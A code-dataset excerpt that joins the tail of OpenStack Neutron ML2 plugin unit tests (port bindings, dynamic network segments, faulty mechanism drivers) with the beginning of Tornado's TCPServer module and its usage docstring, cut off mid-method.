**profile_arg):
pass
except webob.exc.HTTPClientError:
pass
def test_remove_port_binding_profile(self):
profile = {'e': 5}
profile_arg = {portbindings.PROFILE: profile}
with self.port(arg_list=(portbindings.PROFILE,),
**profile_arg) as port:
self._check_port_binding_profile(port['port'], profile)
port_id = port['port']['id']
profile_arg = {portbindings.PROFILE: None}
port = self._update('ports', port_id,
{'port': profile_arg})['port']
self._check_port_binding_profile(port)
port = self._show('ports', port_id)['port']
self._check_port_binding_profile(port)
def test_return_on_concurrent_delete_and_binding(self):
# create a port and delete it so we have an expired mechanism context
with self.port() as port:
plugin = manager.NeutronManager.get_plugin()
binding = ml2_db.get_locked_port_and_binding(self.context.session,
port['port']['id'])[1]
binding['host'] = 'test'
mech_context = driver_context.PortContext(
plugin, self.context, port['port'],
plugin.get_network(self.context, port['port']['network_id']),
binding)
with contextlib.nested(
mock.patch('neutron.plugins.ml2.plugin.'
'db.get_locked_port_and_binding',
return_value=(None, None)),
mock.patch('neutron.plugins.ml2.plugin.Ml2Plugin._make_port_dict')
) as (glpab_mock, mpd_mock):
plugin._bind_port_if_needed(mech_context)
# called during deletion to get port
self.assertTrue(glpab_mock.mock_calls)
# should have returned before calling _make_port_dict
self.assertFalse(mpd_mock.mock_calls)
def test_port_binding_profile_not_changed(self):
profile = {'e': 5}
profile_arg = {portbindings.PROFILE: profile}
with self.port(arg_list=(portbindings.PROFILE,),
**profile_arg) as port:
self._check_port_binding_profile(port['port'], profile)
port_id = port['port']['id']
state_arg = {'admin_state_up': True}
port = self._update('ports', port_id,
{'port': state_arg})['port']
self._check_port_binding_profile(port, profile)
port = self._show('ports', port_id)['port']
self._check_port_binding_profile(port, profile)
def test_process_dvr_port_binding_update_router_id(self):
host_id = 'host'
binding = models.DVRPortBinding(
port_id='port_id',
host=host_id,
router_id='old_router_id',
vif_type=portbindings.VIF_TYPE_OVS,
vnic_type=portbindings.VNIC_NORMAL,
cap_port_filter=False,
status=constants.PORT_STATUS_DOWN)
plugin = manager.NeutronManager.get_plugin()
mock_network = {'id': 'net_id'}
context = mock.Mock()
new_router_id = 'new_router'
attrs = {'device_id': new_router_id, portbindings.HOST_ID: host_id}
with mock.patch.object(plugin, '_update_port_dict_binding'):
with mock.patch.object(ml2_db, 'get_network_segments',
return_value=[]):
mech_context = driver_context.DvrPortContext(
self, context, 'port', mock_network, binding)
plugin._process_dvr_port_binding(mech_context, context, attrs)
self.assertEqual(new_router_id,
mech_context._binding.router_id)
self.assertEqual(host_id, mech_context._binding.host)
def test_update_dvr_port_binding_on_non_existent_port(self):
plugin = manager.NeutronManager.get_plugin()
port = {
'id': 'foo_port_id',
'binding:host_id': 'foo_host',
}
with mock.patch.object(ml2_db, 'ensure_dvr_port_binding') as mock_dvr:
plugin.update_dvr_port_binding(
self.context, 'foo_port_id', {'port': port})
self.assertFalse(mock_dvr.called)
class TestMl2PortBindingNoSG(TestMl2PortBinding):
HAS_PORT_FILTER = False
ENABLE_SG = False
FIREWALL_DRIVER = test_sg_rpc.FIREWALL_NOOP_DRIVER
class TestMl2PortBindingHost(Ml2PluginV2TestCase,
test_bindings.PortBindingsHostTestCaseMixin):
pass
class TestMl2PortBindingVnicType(Ml2PluginV2TestCase,
test_bindings.PortBindingsVnicTestCaseMixin):
pass
class TestMultiSegmentNetworks(Ml2PluginV2TestCase):
def setUp(self, plugin=None):
super(TestMultiSegmentNetworks, self).setUp()
def test_allocate_dynamic_segment(self):
data = {'network': {'name': 'net1',
'tenant_id': 'tenant_one'}}
network_req = self.new_create_request('networks', data)
network = self.deserialize(self.fmt,
network_req.get_response(self.api))
segment = {driver_api.NETWORK_TYPE: 'vlan',
driver_api.PHYSICAL_NETWORK: 'physnet1'}
network_id = network['network']['id']
self.driver.type_manager.allocate_dynamic_segment(
self.context.session, network_id, segment)
dynamic_segment = ml2_db.get_dynamic_segment(self.context.session,
network_id,
'physnet1')
self.assertEqual('vlan', dynamic_segment[driver_api.NETWORK_TYPE])
self.assertEqual('physnet1',
dynamic_segment[driver_api.PHYSICAL_NETWORK])
self.assertTrue(dynamic_segment[driver_api.SEGMENTATION_ID] > 0)
segment2 = {driver_api.NETWORK_TYPE: 'vlan',
driver_api.SEGMENTATION_ID: 1234,
driver_api.PHYSICAL_NETWORK: 'physnet3'}
self.driver.type_manager.allocate_dynamic_segment(
self.context.session, network_id, segment2)
dynamic_segment = ml2_db.get_dynamic_segment(self.context.session,
network_id,
segmentation_id='1234')
self.assertEqual('vlan', dynamic_segment[driver_api.NETWORK_TYPE])
self.assertEqual('physnet3',
dynamic_segment[driver_api.PHYSICAL_NETWORK])
self.assertEqual(dynamic_segment[driver_api.SEGMENTATION_ID], 1234)
def test_allocate_dynamic_segment_multiple_physnets(self):
data = {'network': {'name': 'net1',
'tenant_id': 'tenant_one'}}
network_req = self.new_create_request('networks', data)
network = self.deserialize(self.fmt,
network_req.get_response(self.api))
segment = {driver_api.NETWORK_TYPE: 'vlan',
driver_api.PHYSICAL_NETWORK: 'physnet1'}
network_id = network['network']['id']
self.driver.type_manager.allocate_dynamic_segment(
self.context.session, network_id, segment)
dynamic_segment = ml2_db.get_dynamic_segment(self.context.session,
network_id,
'physnet1')
self.assertEqual('vlan', dynamic_segment[driver_api.NETWORK_TYPE])
self.assertEqual('physnet1',
dynamic_segment[driver_api.PHYSICAL_NETWORK])
dynamic_segmentation_id = dynamic_segment[driver_api.SEGMENTATION_ID]
self.assertTrue(dynamic_segmentation_id > 0)
dynamic_segment1 = ml2_db.get_dynamic_segment(self.context.session,
network_id,
'physnet1')
dynamic_segment1_id = dynamic_segment1[driver_api.SEGMENTATION_ID]
self.assertEqual(dynamic_segmentation_id, dynamic_segment1_id)
segment2 = {driver_api.NETWORK_TYPE: 'vlan',
driver_api.PHYSICAL_NETWORK: 'physnet2'}
self.driver.type_manager.allocate_dynamic_segment(
self.context.session, network_id, segment2)
dynamic_segment2 = ml2_db.get_dynamic_segment(self.context.session,
network_id,
'physnet2')
dynamic_segmentation2_id = dynamic_segment2[driver_api.SEGMENTATION_ID]
self.assertNotEqual(dynamic_segmentation_id, dynamic_segmentation2_id)
def test_allocate_release_dynamic_segment(self):
data = {'network': {'name': 'net1',
'tenant_id': 'tenant_one'}}
network_req = self.new_create_request('networks', data)
network = self.deserialize(self.fmt,
network_req.get_response(self.api))
segment = {driver_api.NETWORK_TYPE: 'vlan',
driver_api.PHYSICAL_NETWORK: 'physnet1'}
network_id = network['network']['id']
self.driver.type_manager.allocate_dynamic_segment(
self.context.session, network_id, segment)
dynamic_segment = ml2_db.get_dynamic_segment(self.context.session,
network_id,
'physnet1')
self.assertEqual('vlan', dynamic_segment[driver_api.NETWORK_TYPE])
self.assertEqual('physnet1',
dynamic_segment[driver_api.PHYSICAL_NETWORK])
dynamic_segmentation_id = dynamic_segment[driver_api.SEGMENTATION_ID]
self.assertTrue(dynamic_segmentation_id > 0)
self.driver.type_manager.release_dynamic_segment(
self.context.session, dynamic_segment[driver_api.ID])
self.assertIsNone(ml2_db.get_dynamic_segment(
self.context.session, network_id, 'physnet1'))
def test_create_network_provider(self):
data = {'network': {'name': 'net1',
pnet.NETWORK_TYPE: 'vlan',
pnet.PHYSICAL_NETWORK: 'physnet1',
pnet.SEGMENTATION_ID: 1,
'tenant_id': 'tenant_one'}}
network_req = self.new_create_request('networks', data)
network = self.deserialize(self.fmt,
network_req.get_response(self.api))
self.assertEqual('vlan', network['network'][pnet.NETWORK_TYPE])
self.assertEqual('physnet1', network['network'][pnet.PHYSICAL_NETWORK])
self.assertEqual(1, network['network'][pnet.SEGMENTATION_ID])
self.assertNotIn(mpnet.SEGMENTS, network['network'])
def test_create_network_single_multiprovider(self):
data = {'network': {'name': 'net1',
mpnet.SEGMENTS:
[{pnet.NETWORK_TYPE: 'vlan',
pnet.PHYSICAL_NETWORK: 'physnet1',
pnet.SEGMENTATION_ID: 1}],
'tenant_id': 'tenant_one'}}
net_req = self.new_create_request('networks', data)
network = self.deserialize(self.fmt, net_req.get_response(self.api))
self.assertEqual('vlan', network['network'][pnet.NETWORK_TYPE])
self.assertEqual('physnet1', network['network'][pnet.PHYSICAL_NETWORK])
self.assertEqual(1, network['network'][pnet.SEGMENTATION_ID])
self.assertNotIn(mpnet.SEGMENTS, network['network'])
# Tests get_network()
net_req = self.new_show_request('networks', network['network']['id'])
network = self.deserialize(self.fmt, net_req.get_response(self.api))
self.assertEqual('vlan', network['network'][pnet.NETWORK_TYPE])
self.assertEqual('physnet1', network['network'][pnet.PHYSICAL_NETWORK])
self.assertEqual(1, network['network'][pnet.SEGMENTATION_ID])
self.assertNotIn(mpnet.SEGMENTS, network['network'])
def test_create_network_multiprovider(self):
data = {'network': {'name': 'net1',
mpnet.SEGMENTS:
[{pnet.NETWORK_TYPE: 'vlan',
pnet.PHYSICAL_NETWORK: 'physnet1',
pnet.SEGMENTATION_ID: 1},
{pnet.NETWORK_TYPE: 'vlan',
pnet.PHYSICAL_NETWORK: 'physnet1',
pnet.SEGMENTATION_ID: 2}],
'tenant_id': 'tenant_one'}}
network_req = self.new_create_request('networks', data)
network = self.deserialize(self.fmt,
network_req.get_response(self.api))
segments = network['network'][mpnet.SEGMENTS]
for segment_index, segment in enumerate(data['network']
[mpnet.SEGMENTS]):
for field in [pnet.NETWORK_TYPE, pnet.PHYSICAL_NETWORK,
pnet.SEGMENTATION_ID]:
self.assertEqual(segment.get(field),
segments[segment_index][field])
# Tests get_network()
net_req = self.new_show_request('networks', network['network']['id'])
network = self.deserialize(self.fmt, net_req.get_response(self.api))
segments = network['network'][mpnet.SEGMENTS]
for segment_index, segment in enumerate(data['network']
[mpnet.SEGMENTS]):
for field in [pnet.NETWORK_TYPE, pnet.PHYSICAL_NETWORK,
pnet.SEGMENTATION_ID]:
self.assertEqual(segment.get(field),
segments[segment_index][field])
def test_create_network_with_provider_and_multiprovider_fail(self):
data = {'network': {'name': 'net1',
mpnet.SEGMENTS:
[{pnet.NETWORK_TYPE: 'vlan',
pnet.PHYSICAL_NETWORK: 'physnet1',
pnet.SEGMENTATION_ID: 1}],
pnet.NETWORK_TYPE: 'vlan',
pnet.PHYSICAL_NETWORK: 'physnet1',
pnet.SEGMENTATION_ID: 1,
'tenant_id': 'tenant_one'}}
network_req = self.new_create_request('networks', data)
res = network_req.get_response(self.api)
self.assertEqual(400, res.status_int)
def test_create_network_duplicate_full_segments(self):
data = {'network': {'name': 'net1',
mpnet.SEGMENTS:
[{pnet.NETWORK_TYPE: 'vlan',
pnet.PHYSICAL_NETWORK: 'physnet1',
pnet.SEGMENTATION_ID: 1},
{pnet.NETWORK_TYPE: 'vlan',
pnet.PHYSICAL_NETWORK: 'physnet1',
pnet.SEGMENTATION_ID: 1}],
'tenant_id': 'tenant_one'}}
network_req = self.new_create_request('networks', data)
res = network_req.get_response(self.api)
self.assertEqual(400, res.status_int)
def test_create_network_duplicate_partial_segments(self):
data = {'network': {'name': 'net1',
mpnet.SEGMENTS:
[{pnet.NETWORK_TYPE: 'vlan',
pnet.PHYSICAL_NETWORK: 'physnet1'},
{pnet.NETWORK_TYPE: 'vlan',
pnet.PHYSICAL_NETWORK: 'physnet1'}],
'tenant_id': 'tenant_one'}}
network_req = self.new_create_request('networks', data)
res = network_req.get_response(self.api)
self.assertEqual(201, res.status_int)
def test_release_network_segments(self):
data = {'network': {'name': 'net1',
'admin_state_up': True,
'shared': False,
pnet.NETWORK_TYPE: 'vlan',
pnet.PHYSICAL_NETWORK: 'physnet1',
pnet.SEGMENTATION_ID: 1,
'tenant_id': 'tenant_one'}}
network_req = self.new_create_request('networks', data)
res = network_req.get_response(self.api)
network = self.deserialize(self.fmt, res)
network_id = network['network']['id']
segment = {driver_api.NETWORK_TYPE: 'vlan',
driver_api.PHYSICAL_NETWORK: 'physnet2'}
self.driver.type_manager.allocate_dynamic_segment(
self.context.session, network_id, segment)
dynamic_segment = ml2_db.get_dynamic_segment(self.context.session,
network_id,
'physnet2')
self.assertEqual('vlan', dynamic_segment[driver_api.NETWORK_TYPE])
self.assertEqual('physnet2',
dynamic_segment[driver_api.PHYSICAL_NETWORK])
self.assertTrue(dynamic_segment[driver_api.SEGMENTATION_ID] > 0)
with mock.patch.object(type_vlan.VlanTypeDriver,
'release_segment') as rs:
req = self.new_delete_request('networks', network_id)
res = req.get_response(self.api)
self.assertEqual(2, rs.call_count)
self.assertEqual(ml2_db.get_network_segments(
self.context.session, network_id), [])
self.assertIsNone(ml2_db.get_dynamic_segment(
self.context.session, network_id, 'physnet2'))
def test_release_segment_no_type_driver(self):
data = {'network': {'name': 'net1',
'admin_state_up': True,
'shared': False,
pnet.NETWORK_TYPE: 'vlan',
pnet.PHYSICAL_NETWORK: 'physnet1',
pnet.SEGMENTATION_ID: 1,
'tenant_id': 'tenant_one'}}
network_req = self.new_create_request('networks', data)
res = network_req.get_response(self.api)
network = self.deserialize(self.fmt, res)
network_id = network['network']['id']
segment = {driver_api.NETWORK_TYPE: 'faketype',
driver_api.PHYSICAL_NETWORK: 'physnet1',
driver_api.ID: 1}
with mock.patch('neutron.plugins.ml2.managers.LOG') as log:
with mock.patch('neutron.plugins.ml2.managers.db') as db:
db.get_network_segments.return_value = (segment,)
self.driver.type_manager.release_network_segments(
self.context.session, network_id)
log.error.assert_called_once_with(
"Failed to release segment '%s' because "
"network type is not supported.", segment)
def test_create_provider_fail(self):
segment = {pnet.NETWORK_TYPE: None,
pnet.PHYSICAL_NETWORK: 'phys_net',
pnet.SEGMENTATION_ID: None}
with testtools.ExpectedException(exc.InvalidInput):
self.driver.type_manager._process_provider_create(segment)
def test_create_network_plugin(self):
data = {'network': {'name': 'net1',
'admin_state_up': True,
'shared': False,
pnet.NETWORK_TYPE: 'vlan',
pnet.PHYSICAL_NETWORK: 'physnet1',
pnet.SEGMENTATION_ID: 1,
'tenant_id': 'tenant_one'}}
def raise_mechanism_exc(*args, **kwargs):
raise ml2_exc.MechanismDriverError(
method='create_network_postcommit')
with mock.patch('neutron.plugins.ml2.managers.MechanismManager.'
'create_network_precommit', new=raise_mechanism_exc):
with testtools.ExpectedException(ml2_exc.MechanismDriverError):
self.driver.create_network(self.context, data)
def test_extend_dictionary_no_segments(self):
network = dict(name='net_no_segment', id='5', tenant_id='tenant_one')
self.driver.type_manager._extend_network_dict_provider(self.context,
network)
self.assertIsNone(network[pnet.NETWORK_TYPE])
self.assertIsNone(network[pnet.PHYSICAL_NETWORK])
self.assertIsNone(network[pnet.SEGMENTATION_ID])
class TestMl2AllowedAddressPairs(Ml2PluginV2TestCase,
test_pair.TestAllowedAddressPairs):
def setUp(self, plugin=None):
super(test_pair.TestAllowedAddressPairs, self).setUp(
plugin=PLUGIN_NAME)
class DHCPOptsTestCase(test_dhcpopts.TestExtraDhcpOpt):
def setUp(self, plugin=None):
super(test_dhcpopts.ExtraDhcpOptDBTestCase, self).setUp(
plugin=PLUGIN_NAME)
class Ml2PluginV2FaultyDriverTestCase(test_plugin.NeutronDbPluginV2TestCase):
def setUp(self):
# Enable the test mechanism driver to ensure that
# we can successfully call through to all mechanism
# driver apis.
config.cfg.CONF.set_override('mechanism_drivers',
['test', 'logger'],
group='ml2')
super(Ml2PluginV2FaultyDriverTestCase, self).setUp(PLUGIN_NAME)
self.port_create_status = 'DOWN'
class TestFaultyMechanismDriver(Ml2PluginV2FaultyDriverTestCase):
def test_create_network_faulty(self):
with mock.patch.object(mech_test.TestMechanismDriver,
'create_network_postcommit',
side_effect=ml2_exc.MechanismDriverError):
tenant_id = str(uuid.uuid4())
data = {'network': {'name': 'net1',
'tenant_id': tenant_id}}
req = self.new_create_request('networks', data)
res = req.get_response(self.api)
self.assertEqual(500, res.status_int)
error = self.deserialize(self.fmt, res)
self.assertEqual('MechanismDriverError',
error['NeutronError']['type'])
query_params = "tenant_id=%s" % tenant_id
nets = self._list('networks', query_params=query_params)
self.assertFalse(nets['networks'])
def test_delete_network_faulty(self):
with mock.patch.object(mech_test.TestMechanismDriver,
'delete_network_postcommit',
side_effect=ml2_exc.MechanismDriverError):
with mock.patch.object(mech_logger.LoggerMechanismDriver,
'delete_network_postcommit') as dnp:
data = {'network': {'name': 'net1',
'tenant_id': 'tenant_one'}}
network_req = self.new_create_request('networks', data)
network_res = network_req.get_response(self.api)
self.assertEqual(201, network_res.status_int)
network = self.deserialize(self.fmt, network_res)
net_id = network['network']['id']
req = self.new_delete_request('networks', net_id)
res = req.get_response(self.api)
self.assertEqual(204, res.status_int)
# Test if other mechanism driver was called
self.assertTrue(dnp.called)
self._show('networks', net_id,
expected_code=webob.exc.HTTPNotFound.code)
def test_update_network_faulty(self):
with mock.patch.object(mech_test.TestMechanismDriver,
'update_network_postcommit',
side_effect=ml2_exc.MechanismDriverError):
with mock.patch.object(mech_logger.LoggerMechanismDriver,
'update_network_postcommit') as unp:
data = {'network': {'name': 'net1',
'tenant_id': 'tenant_one'}}
network_req = self.new_create_request('networks', data)
network_res = network_req.get_response(self.api)
self.assertEqual(201, network_res.status_int)
network = self.deserialize(self.fmt, network_res)
net_id = network['network']['id']
new_name = 'a_brand_new_name'
data = {'network': {'name': new_name}}
req = self.new_update_request('networks', data, net_id)
res = req.get_response(self.api)
self.assertEqual(500, res.status_int)
error = self.deserialize(self.fmt, res)
self.assertEqual('MechanismDriverError',
error['NeutronError']['type'])
# Test if other mechanism driver was called
self.assertTrue(unp.called)
net = self._show('networks', net_id)
self.assertEqual(new_name, net['network']['name'])
self._delete('networks', net_id)
def test_create_subnet_faulty(self):
with mock.patch.object(mech_test.TestMechanismDriver,
'create_subnet_postcommit',
side_effect=ml2_exc.MechanismDriverError):
with self.network() as network:
net_id = network['network']['id']
data = {'subnet': {'network_id': net_id,
'cidr': '10.0.20.0/24',
'ip_version': '4',
'name': 'subnet1',
'tenant_id':
network['network']['tenant_id'],
'gateway_ip': '10.0.20.1'}}
req = self.new_create_request('subnets', data)
res = req.get_response(self.api)
self.assertEqual(500, res.status_int)
error = self.deserialize(self.fmt, res)
self.assertEqual('MechanismDriverError',
error['NeutronError']['type'])
query_params = "network_id=%s" % net_id
subnets = self._list('subnets', query_params=query_params)
self.assertFalse(subnets['subnets'])
def test_delete_subnet_faulty(self):
with mock.patch.object(mech_test.TestMechanismDriver,
'delete_subnet_postcommit',
side_effect=ml2_exc.MechanismDriverError):
with mock.patch.object(mech_logger.LoggerMechanismDriver,
'delete_subnet_postcommit') as dsp:
with self.network() as network:
data = {'subnet': {'network_id':
network['network']['id'],
'cidr': '10.0.20.0/24',
'ip_version': '4',
'name': 'subnet1',
'tenant_id':
network['network']['tenant_id'],
'gateway_ip': '10.0.20.1'}}
subnet_req = self.new_create_request('subnets', data)
subnet_res = subnet_req.get_response(self.api)
self.assertEqual(201, subnet_res.status_int)
subnet = self.deserialize(self.fmt, subnet_res)
subnet_id = subnet['subnet']['id']
req = self.new_delete_request('subnets', subnet_id)
res = req.get_response(self.api)
self.assertEqual(204, res.status_int)
# Test if other mechanism driver was called
self.assertTrue(dsp.called)
self._show('subnets', subnet_id,
expected_code=webob.exc.HTTPNotFound.code)
def test_update_subnet_faulty(self):
with mock.patch.object(mech_test.TestMechanismDriver,
'update_subnet_postcommit',
side_effect=ml2_exc.MechanismDriverError):
with mock.patch.object(mech_logger.LoggerMechanismDriver,
'update_subnet_postcommit') as usp:
with self.network() as network:
data = {'subnet': {'network_id':
network['network']['id'],
'cidr': '10.0.20.0/24',
'ip_version': '4',
'name': 'subnet1',
'tenant_id':
network['network']['tenant_id'],
'gateway_ip': '10.0.20.1'}}
subnet_req = self.new_create_request('subnets', data)
subnet_res = subnet_req.get_response(self.api)
self.assertEqual(201, subnet_res.status_int)
subnet = self.deserialize(self.fmt, subnet_res)
subnet_id = subnet['subnet']['id']
new_name = 'a_brand_new_name'
data = {'subnet': {'name': new_name}}
req = self.new_update_request('subnets', data, subnet_id)
res = req.get_response(self.api)
self.assertEqual(500, res.status_int)
error = self.deserialize(self.fmt, res)
self.assertEqual('MechanismDriverError',
error['NeutronError']['type'])
# Test if other mechanism driver was called
self.assertTrue(usp.called)
subnet = self._show('subnets', subnet_id)
self.assertEqual(new_name, subnet['subnet']['name'])
self._delete('subnets', subnet['subnet']['id'])
def test_create_port_faulty(self):
with mock.patch.object(mech_test.TestMechanismDriver,
'create_port_postcommit',
side_effect=ml2_exc.MechanismDriverError):
with self.network() as network:
net_id = network['network']['id']
data = {'port': {'network_id': net_id,
'tenant_id':
network['network']['tenant_id'],
'name': 'port1',
'admin_state_up': 1,
'fixed_ips': []}}
req = self.new_create_request('ports', data)
res = req.get_response(self.api)
self.assertEqual(500, res.status_int)
error = self.deserialize(self.fmt, res)
self.assertEqual('MechanismDriverError',
error['NeutronError']['type'])
query_params = "network_id=%s" % net_id
ports = self._list('ports', query_params=query_params)
self.assertFalse(ports['ports'])
def test_update_port_faulty(self):
with mock.patch.object(mech_test.TestMechanismDriver,
'update_port_postcommit',
side_effect=ml2_exc.MechanismDriverError):
with mock.patch.object(mech_logger.LoggerMechanismDriver,
'update_port_postcommit') as upp:
with self.network() as network:
data = {'port': {'network_id': network['network']['id'],
'tenant_id':
network['network']['tenant_id'],
'name': 'port1',
'admin_state_up': 1,
'fixed_ips': []}}
port_req = self.new_create_request('ports', data)
port_res = port_req.get_response(self.api)
self.assertEqual(201, port_res.status_int)
port = self.deserialize(self.fmt, port_res)
port_id = port['port']['id']
new_name = 'a_brand_new_name'
data = {'port': {'name': new_name}}
req = self.new_update_request('ports', data, port_id)
res = req.get_response(self.api)
self.assertEqual(500, res.status_int)
error = self.deserialize(self.fmt, res)
self.assertEqual('MechanismDriverError',
error['NeutronError']['type'])
# Test if other mechanism driver was called
self.assertTrue(upp.called)
port = self._show('ports', port_id)
self.assertEqual(new_name, port['port']['name'])
self._delete('ports', port['port']['id'])
class TestMl2PluginCreateUpdateDeletePort(base.BaseTestCase):
def setUp(self):
super(TestMl2PluginCreateUpdateDeletePort, self).setUp()
self.context = mock.MagicMock()
def _ensure_transaction_is_closed(self):
transaction = self.context.session.begin(subtransactions=True)
enter = transaction.__enter__.call_count
exit = transaction.__exit__.call_count
self.assertEqual(enter, exit)
def _create_plugin_for_create_update_port(self, new_host_port):
plugin = ml2_plugin.Ml2Plugin()
plugin.extension_manager = mock.Mock()
plugin.type_manager = mock.Mock()
plugin.mechanism_manager = mock.Mock()
plugin.notifier = mock.Mock()
plugin._get_host_port_if_changed = mock.Mock(
return_value=new_host_port)
plugin._notify_l3_agent_new_port = mock.Mock()
plugin._notify_l3_agent_new_port.side_effect = (
lambda c, p: self._ensure_transaction_is_closed())
return plugin
def test_create_port_rpc_outside_transaction(self):
with contextlib.nested(
mock.patch.object(ml2_plugin.Ml2Plugin, '__init__'),
mock.patch.object(base_plugin.NeutronDbPluginV2, 'create_port'),
) as (init, super_create_port):
init.return_value = None
new_host_port = mock.Mock()
plugin = self._create_plugin_for_create_update_port(new_host_port)
plugin.create_port(self.context, mock.MagicMock())
plugin._notify_l3_agent_new_port.assert_called_once_with(
self.context, new_host_port)
def test_update_port_rpc_outside_transaction(self):
with contextlib.nested(
mock.patch.object(ml2_plugin.Ml2Plugin, '__init__'),
mock.patch.object(base_plugin.NeutronDbPluginV2, 'update_port'),
) as (init, super_update_port):
init.return_value = None
new_host_port = mock.Mock()
plugin = self._create_plugin_for_create_update_port(new_host_port)
plugin.update_port(self.context, 'fake_id', mock.MagicMock())
plugin._notify_l3_agent_new_port.assert_called_once_with(
self.context, new_host_port)
def test_vmarp_table_update_outside_of_delete_transaction(self):
l3plugin = mock.Mock()
l3plugin.dvr_vmarp_table_update = (
lambda *args, **kwargs: self._ensure_transaction_is_closed())
l3plugin.dvr_deletens_if_no_port.return_value = []
l3plugin.supported_extension_aliases = [
'router', constants.L3_AGENT_SCHEDULER_EXT_ALIAS,
constants.L3_DISTRIBUTED_EXT_ALIAS
]
with contextlib.nested(
mock.patch.object(ml2_plugin.Ml2Plugin, '__init__',
return_value=None),
mock.patch.object(manager.NeutronManager,
'get_service_plugins',
return_value={'L3_ROUTER_NAT': l3plugin}),
):
plugin = self._create_plugin_for_create_update_port(mock.Mock())
# deleting the port will call dvr_vmarp_table_update, which will
# run the transaction balancing function defined in this test
plugin.delete_port(self.context, 'fake_id')
| apache-2.0 |
leekchan/tornado_test | tornado/tcpserver.py | 74 | 10693 | #!/usr/bin/env python
#
# Copyright 2011 Facebook
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""A non-blocking, single-threaded TCP server."""
from __future__ import absolute_import, division, print_function, with_statement
import errno
import os
import socket
from tornado.log import app_log
from tornado.ioloop import IOLoop
from tornado.iostream import IOStream, SSLIOStream
from tornado.netutil import bind_sockets, add_accept_handler, ssl_wrap_socket
from tornado import process
from tornado.util import errno_from_exception
try:
import ssl
except ImportError:
# ssl is not available on Google App Engine.
ssl = None
class TCPServer(object):
r"""A non-blocking, single-threaded TCP server.
To use `TCPServer`, define a subclass which overrides the `handle_stream`
method.
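    For example, a minimal echo server might look like this (an
    illustrative sketch; ``EchoServer`` is just an example name, not part
    of this module)::
        from tornado import gen
        from tornado.iostream import StreamClosedError
        class EchoServer(TCPServer):
            @gen.coroutine
            def handle_stream(self, stream, address):
                while True:
                    try:
                        data = yield stream.read_until(b"\n")
                        yield stream.write(data)
                    except StreamClosedError:
                        break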
To make this server serve SSL traffic, send the ssl_options dictionary
argument with the arguments required for the `ssl.wrap_socket` method,
including "certfile" and "keyfile"::
TCPServer(ssl_options={
"certfile": os.path.join(data_dir, "mydomain.crt"),
"keyfile": os.path.join(data_dir, "mydomain.key"),
})
`TCPServer` initialization follows one of three patterns:
1. `listen`: simple single-process::
server = TCPServer()
server.listen(8888)
IOLoop.instance().start()
2. `bind`/`start`: simple multi-process::
server = TCPServer()
server.bind(8888)
server.start(0) # Forks multiple sub-processes
IOLoop.instance().start()
When using this interface, an `.IOLoop` must *not* be passed
to the `TCPServer` constructor. `start` will always start
the server on the default singleton `.IOLoop`.
3. `add_sockets`: advanced multi-process::
sockets = bind_sockets(8888)
tornado.process.fork_processes(0)
server = TCPServer()
server.add_sockets(sockets)
IOLoop.instance().start()
The `add_sockets` interface is more complicated, but it can be
used with `tornado.process.fork_processes` to give you more
flexibility in when the fork happens. `add_sockets` can
also be used in single-process servers if you want to create
your listening sockets in some way other than
`~tornado.netutil.bind_sockets`.
.. versionadded:: 3.1
The ``max_buffer_size`` argument.
"""
def __init__(self, io_loop=None, ssl_options=None, max_buffer_size=None,
read_chunk_size=None):
self.io_loop = io_loop
self.ssl_options = ssl_options
self._sockets = {} # fd -> socket object
self._pending_sockets = []
self._started = False
self.max_buffer_size = max_buffer_size
        self.read_chunk_size = read_chunk_size
# Verify the SSL options. Otherwise we don't get errors until clients
# connect. This doesn't verify that the keys are legitimate, but
# the SSL module doesn't do that until there is a connected socket
        # which seems like too much work.
if self.ssl_options is not None and isinstance(self.ssl_options, dict):
# Only certfile is required: it can contain both keys
if 'certfile' not in self.ssl_options:
raise KeyError('missing key "certfile" in ssl_options')
if not os.path.exists(self.ssl_options['certfile']):
raise ValueError('certfile "%s" does not exist' %
self.ssl_options['certfile'])
if ('keyfile' in self.ssl_options and
not os.path.exists(self.ssl_options['keyfile'])):
raise ValueError('keyfile "%s" does not exist' %
self.ssl_options['keyfile'])
def listen(self, port, address=""):
"""Starts accepting connections on the given port.
This method may be called more than once to listen on multiple ports.
`listen` takes effect immediately; it is not necessary to call
`TCPServer.start` afterwards. It is, however, necessary to start
the `.IOLoop`.
"""
sockets = bind_sockets(port, address=address)
self.add_sockets(sockets)
def add_sockets(self, sockets):
"""Makes this server start accepting connections on the given sockets.
The ``sockets`` parameter is a list of socket objects such as
those returned by `~tornado.netutil.bind_sockets`.
`add_sockets` is typically used in combination with that
method and `tornado.process.fork_processes` to provide greater
control over the initialization of a multi-process server.
"""
if self.io_loop is None:
self.io_loop = IOLoop.current()
for sock in sockets:
self._sockets[sock.fileno()] = sock
add_accept_handler(sock, self._handle_connection,
io_loop=self.io_loop)
def add_socket(self, socket):
"""Singular version of `add_sockets`. Takes a single socket object."""
self.add_sockets([socket])
def bind(self, port, address=None, family=socket.AF_UNSPEC, backlog=128):
"""Binds this server to the given port on the given address.
To start the server, call `start`. If you want to run this server
in a single process, you can call `listen` as a shortcut to the
sequence of `bind` and `start` calls.
Address may be either an IP address or hostname. If it's a hostname,
the server will listen on all IP addresses associated with the
name. Address may be an empty string or None to listen on all
available interfaces. Family may be set to either `socket.AF_INET`
or `socket.AF_INET6` to restrict to IPv4 or IPv6 addresses, otherwise
both will be used if available.
The ``backlog`` argument has the same meaning as for
`socket.listen <socket.socket.listen>`.
This method may be called multiple times prior to `start` to listen
on multiple ports or interfaces.
"""
sockets = bind_sockets(port, address=address, family=family,
backlog=backlog)
if self._started:
self.add_sockets(sockets)
else:
self._pending_sockets.extend(sockets)
def start(self, num_processes=1):
"""Starts this server in the `.IOLoop`.
By default, we run the server in this process and do not fork any
additional child process.
If num_processes is ``None`` or <= 0, we detect the number of cores
available on this machine and fork that number of child
processes. If num_processes is given and > 1, we fork that
specific number of sub-processes.
Since we use processes and not threads, there is no shared memory
between any server code.
Note that multiple processes are not compatible with the autoreload
module (or the ``autoreload=True`` option to `tornado.web.Application`
which defaults to True when ``debug=True``).
When using multiple processes, no IOLoops can be created or
referenced until after the call to ``TCPServer.start(n)``.
"""
assert not self._started
self._started = True
if num_processes != 1:
